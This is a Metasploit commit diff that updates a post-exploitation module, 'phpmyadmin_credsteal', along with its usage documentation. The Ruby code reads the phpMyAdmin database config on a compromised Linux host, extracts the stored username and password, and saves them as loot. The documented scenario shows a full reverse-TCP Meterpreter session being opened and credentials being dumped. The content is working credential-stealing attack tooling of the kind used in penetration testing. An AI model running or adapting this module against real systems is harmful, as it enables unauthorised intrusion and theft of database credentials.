Land #10598, Store Credentials Found with PhpMyAdmin Password Extractor
parent
3e801c22fb
commit
5861087061
|
@ -15,36 +15,34 @@ This post module gathers PhpMyAdmin Creds from target Linux machine.
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1
|
msf5 > use multi/handler
|
||||||
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400
|
msf5 exploit(multi/handler) > set lhost 192.168.37.1
|
||||||
|
lhost => 192.168.37.1
|
||||||
|
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
|
||||||
|
payload => linux/x64/meterpreter/reverse_tcp
|
||||||
|
msf5 exploit(multi/handler) > run
|
||||||
|
|
||||||
msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
|
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||||
msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1
|
[*] Sending stage (816260 bytes) to 192.168.37.226
|
||||||
SESSION => 1
|
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500
|
||||||
msf post(linux/gather/phpmyadmin_credsteal) > exploit
|
|
||||||
|
meterpreter > background
|
||||||
|
[*] Backgrounding session 2...
|
||||||
|
msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
|
||||||
|
msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2
|
||||||
|
session => 2
|
||||||
|
msf5 post(linux/gather/phpmyadmin_credsteal) > run
|
||||||
|
|
||||||
|
|
||||||
|
PhpMyAdmin Creds Stealer!
|
||||||
|
|
||||||
[+] PhpMyAdmin config found!
|
[+] PhpMyAdmin config found!
|
||||||
[+] Extracting config file!
|
[+] Extracting creds
|
||||||
|
[+] User: admin
|
||||||
<?php
|
[+] Password: acoolpassword
|
||||||
##
|
[*] Storing credentials...
|
||||||
## database access settings in php format
|
[+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt
|
||||||
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
|
|
||||||
## by /usr/sbin/dbconfig-generate-include
|
|
||||||
##
|
|
||||||
## by default this file is managed via ucf, so you shouldn't have to
|
|
||||||
## worry about manual changes being silently discarded. *however*,
|
|
||||||
## you'll probably also want to edit the configuration file mentioned
|
|
||||||
## above too.
|
|
||||||
##
|
|
||||||
$dbuser='phpmyadmin';
|
|
||||||
$dbpass='Passw0rd';
|
|
||||||
$basepath='';
|
|
||||||
$dbname='phpmyadmin';
|
|
||||||
$dbserver='localhost';
|
|
||||||
$dbport='3306';
|
|
||||||
$dbtype='mysql';
|
|
||||||
|
|
||||||
[*] Post module execution completed
|
[*] Post module execution completed
|
||||||
msf post(linux/gather/phpmyadmin_credsteal) >
|
msf5 post(linux/gather/phpmyadmin_credsteal) >
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
|
@ -25,32 +25,47 @@ class MetasploitModule < Msf::Post
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def parse_creds(contents)
|
||||||
|
db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first
|
||||||
|
db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first
|
||||||
|
|
||||||
|
unless db_user && db_pass
|
||||||
|
print_error("Couldn't find PhpMyAdmin credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("User: #{db_user}")
|
||||||
|
print_good("Password: #{db_pass}")
|
||||||
|
|
||||||
|
print_status("Storing credentials...")
|
||||||
|
store_valid_credential(user: db_user, private: db_pass)
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
print_line("\nPhpMyAdmin Creds Stealer!\n")
|
print_line("\nPhpMyAdmin Creds Stealer!\n")
|
||||||
cred_dump = ""
|
|
||||||
|
|
||||||
if session.platform.include?("windows")
|
if session.platform.include?("windows")
|
||||||
print_error("This module is not compatible with windows")
|
print_error("This module is not compatible with windows")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
conf_path= "/etc/phpmyadmin/config-db.php"
|
conf_path = "/etc/phpmyadmin/config-db.php"
|
||||||
unless file_exist?(conf_path)
|
unless file_exist?(conf_path)
|
||||||
print_error("#{conf_path} doesn't exist on target")
|
print_error("#{conf_path} doesn't exist on target")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_good('PhpMyAdmin config found!')
|
print_good('PhpMyAdmin config found!')
|
||||||
print_good("Extracting Creds")
|
|
||||||
res = read_file(conf_path)
|
res = read_file(conf_path)
|
||||||
unless res
|
unless res
|
||||||
print_error("You may not have permissions to read the file.")
|
print_error("You may not have permissions to read the file.")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
cred_dump << res
|
print_good("Extracting creds")
|
||||||
p = store_loot('phpmyadmin_conf', 'text/plain', session, cred_dump, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
|
parse_creds(res)
|
||||||
print_good("Credentials saved in #{p}")
|
|
||||||
|
p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
|
||||||
|
print_good("Config file located at #{p}")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue